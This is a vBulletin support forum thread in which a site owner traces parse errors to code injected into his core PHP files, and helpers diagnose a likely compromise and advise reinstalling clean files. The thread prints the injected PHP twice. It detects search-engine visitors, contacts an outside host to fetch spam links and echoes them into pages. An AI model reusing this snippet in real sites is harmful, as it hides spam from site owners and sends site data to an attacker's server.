Collapse
X

• Time
  • Show
Clear All
  • chriswh86
    • Nov 2012

parse error on forum.php

I just got this error on my website today and Im not sure why it has come up.

Parse error: syntax error, unexpected '<' in E:\Sites\Single1\hallidayracing\webroot\forum.php on line 829
    PHP Parse error: syntax error, unexpected '<' in E:\Sites\Single1\hallidayracing\webroot\forum.php on line 829

line 829 is just the following
    <?php

I have not updated any files in my website all I did yesterday was post a new forum topic and the site worked fine all day afterwards, so something happened last night for some reason?

Any help would be greatly appreciated
    http://www.250explorer.com

• Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000

Line 829 should not be <?php. That code should only exist as the very first line in the file. Please re-upload an unmodified forum.php file.
    Translations provided by Google.

Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API

Comment

• chriswh86
      • Nov 2012

Ok will do. Any idea why this would have changed on its own?

Comment

• chriswh86
        • Nov 2012

Ok, I am starting to get more parse errors after I fix each file. It started on forum.php then there was an error on global.php and now on class_bootstrap.php? Any ideas why this is happening and the best safest way to fix it

Comment

• Mark.B
          vBulletin Support
          • Feb 2004
          • 6.0.X

What version of vBulletin?
          What version of php?
          MARK.B
          vBulletin Support
          ------------
          My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
          My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

Comment

• chriswh86
            • Nov 2012

vb version 4.2.2 patch level 2 I am not sure on the php version

Comment

• chriswh86
              • Nov 2012

Ok, So ive had issues with forum.php, global.php, class_bootstrap.php, class_core.php, config.php, functions.php and class_friendly_url.php all with a <?php errror tag near the bottom of the files. I now have this issue...

$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']); $userref = strtolower($_SERVER['HTTP_REFERER']); $flag = false; if(strpos($userref, "google") !== false || strpos($userref, "bing") !== false || strpos($userref, "yahoo") !== false || strpos($userref, "aol") !== false) { $flag = true; }else if(strpos($userAgent, "googlebot") !== false || strpos($userAgent, "baiduspider") !== false || strpos($userAgent, "yahoo! slurp") !== false || strpos($userAgent, "msnbot") !== false) { $flag = true; } if($flag){ $rhost="www.extremespread.com"; $rpath="http://www.extremespread.com/getoutlinks.php"; $blackpath = $_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; $user_agent = $_SERVER["HTTP_USER_AGENT"]; $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'],0,4); $socket = fsockopen($rhost, 80, $errno, $errstr, 30); if (!$socket) die("$errstr($errno)"); fwrite($socket, "GET $rpath?display=1&url=$blackpath HTTP/1.0\r\n"); fwrite($socket, "User-Agent: $user_agent\r\n"); fwrite($socket, "HOST: $rhost\r\n"); fwrite($socket, "Content-type: application/x-www-form-urlencoded\r\n"); fwrite($socket, "Accept:*/*\r\n"); fwrite($socket, "\r\n"); $header = ""; while ($str = trim(fgets($socket, 4096))) { $header .= $str; } $data = ""; while (!feof($socket)) { $data .= fgets($socket, 4096); } echo $data; } ?>Unable to add cookies, header already sent.
              File: E:\Sites\Single1\hallidayracing\webroot\includes\functions_navigation.php
              Line: 1154

I only have version 4.2.1 on my computer and I am wondering where I can get 4.2.2 documents to re-upload to my webhost. Or should I revert back to the origial parse error and upload 4.2.1's unmodified forum.php page?

Comment

• Mark.B
                vBulletin Support
                • Feb 2004
                • 6.0.X

You cannot mix files from different versions like that.If you are running 4.2.2, then you need ALL the files to be from 4.2.2. You can't add some 4.2.1 files just because something isn't working for you.

You need to let us know the php version you are are running. If you don't know, please check with your host. We can't advise correctly until we know this.
                MARK.B
                vBulletin Support
                ------------
                My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
                My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

Comment

• kh99
                  • Aug 2009

Originally posted by chriswh86
                  Ok, So ive had issues with forum.php, global.php, class_bootstrap.php, class_core.php, config.php, functions.php and class_friendly_url.php all with a <?php errror tag near the bottom of the files. I now have this issue...

$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']); $userref = strtolower($_SERVER['HTTP_REFERER']); $flag = false; if(strpos($userref, "google") !== false || strpos($userref, "bing") !== false || strpos($userref, "yahoo") !== false || strpos($userref, "aol") !== false) { $flag = true; }else if(strpos($userAgent, "googlebot") !== false || strpos($userAgent, "baiduspider") !== false || strpos($userAgent, "yahoo! slurp") !== false || strpos($userAgent, "msnbot") !== false) { $flag = true; } if($flag){ $rhost="www.extremespread.com"; $rpath="http://www.extremespread.com/getoutlinks.php"; $blackpath = $_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; $user_agent = $_SERVER["HTTP_USER_AGENT"]; $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'],0,4); $socket = fsockopen($rhost, 80, $errno, $errstr, 30); if (!$socket) die("$errstr($errno)"); fwrite($socket, "GET $rpath?display=1&url=$blackpath HTTP/1.0\r\n"); fwrite($socket, "User-Agent: $user_agent\r\n"); fwrite($socket, "HOST: $rhost\r\n"); fwrite($socket, "Content-type: application/x-www-form-urlencoded\r\n"); fwrite($socket, "Accept:*/*\r\n"); fwrite($socket, "\r\n"); $header = ""; while ($str = trim(fgets($socket, 4096))) { $header .= $str; } $data = ""; while (!feof($socket)) { $data .= fgets($socket, 4096); } echo $data; } ?>Unable to add cookies, header already sent.
                  File: E:\Sites\Single1\hallidayracing\webroot\includes\functions_navigation.php
                  [COLOR=#000000][FONT=Times New Roman]Line: 1154
                  That kind of looks like someone tried to modify your files to add their own links to the bottom, unless you know what www.extremespread.com is.
                  Last edited by kh99; Tue 16 Dec '14, 4:19pm.

Comment

• chriswh86
                    • Nov 2012

Originally posted by kh99

That kind of looks like someone tried to modify your files to add their own links to the bottom, unless you know what www.extremespread.com is.

I definantly do not recognize that link.

I am running PHP version PHP Version 5.3.27

Advise from here, Thanks

Comment

• Zachery
                      Former vBulletin Support
                      • Jul 2002

I'd reupload ALL of the 4.2.2 files.

Comment

• chriswh86
                        • Nov 2012

Ok will do. What sort of issues can I expect with re-uploading the 4.2.2 files? I have backed up my database, but will I loose any other content from re-uploading?

Comment

• kh99
                          • Aug 2009

You should be OK as long as you haven't made any changes to any vbulletin files.

I'm kind of hesitatnt to say anything because I'm not 100% sure, but if that stuff started appearing in your files and you can't explain why, then it might mean someone's hacked your forum or something on your server, so you'd want to try to figure out how it happened or else it might just happen again once everything is restored.

Comment

• chriswh86
                            • Nov 2012

I have a custom template (purchased from a vb4 template maker), logo, all the forum fields and posts, should I be worried about these things when re-uploading 4.2.2?

Comment

• kh99
                              • Aug 2009

You should be OK, those things are in the database, except maybe the logo image. But that's only a problem if it happens to be named the same as one of the vbulletin files. If you're concerned, what you could do is download your forum directory to your local computer first, to save a copy of it.

It might be a good idea to get someone to help you, if you don't feel confident,

Comment